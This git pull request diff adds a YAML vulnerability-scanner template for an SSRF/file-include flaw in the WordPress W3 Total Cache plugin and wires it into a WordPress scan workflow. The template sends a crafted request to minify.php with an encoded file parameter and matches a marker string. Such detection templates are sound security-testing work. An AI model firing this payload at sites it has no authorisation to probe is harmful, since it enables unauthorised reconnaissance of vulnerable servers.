Merge pull request #541 from random-robbie/patch-10

Create w3c-total-cache.yaml

vulnerabilities/w3c-total-cache-ssrf.yaml

@@ -0,0 +1,19 @@
+id: w3c-total-cache-ssrf
+info:
+  name: Wordpress W3C Total Cache SSRF <= 0.9.4
+  author: random-robbie
+  severity: medium
+
+  # Reference
+  # https://wpvulndb.com/vulnerabilities/8644
+  # https://klikki.fi/adv/w3_total_cache.html
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/w3-total-cache/pub/minify.php?file=yygpKbDS1y9Ky9TLSy0uLi3Wyy9KB3NLKkqUM4CyxUDpxKzECr30_Pz0nNTEgsxiveT8XAA.css'
+    matchers:
+      - type: word
+        words:
+          - "NessusFileIncludeTest"
+        part: body

workflows/wordpress-workflow.yaml

@@ -16,6 +16,7 @@ variables:
   wordpress_installer_log: files/wordpress-installer-log.yaml
   wordpress_tmm_db_migrate: files/wordpress-tmm-db-migrate.yaml
   wordpress_social_metrics_tracker: vulnerabilities/wordpress-social-metrics-tracker.yaml
+  w3c_total_cache_ssrf: vulnerabilities/w3c-total-cache-ssrf.yaml
   wordpress_cve: cves/CVE-2019-9978.yaml
   wordpress_cve_2: cves/CVE-2019-6715.yaml
 
@@ -35,6 +36,7 @@ logic: |
     wordpress_installer_log()
     wordpress_tmm_db_migrate()
     wordpress_social_metrics_tracker()
+    w3c_total_cache_ssrf()
     wordpress_cve()
     wordpress_cve_2()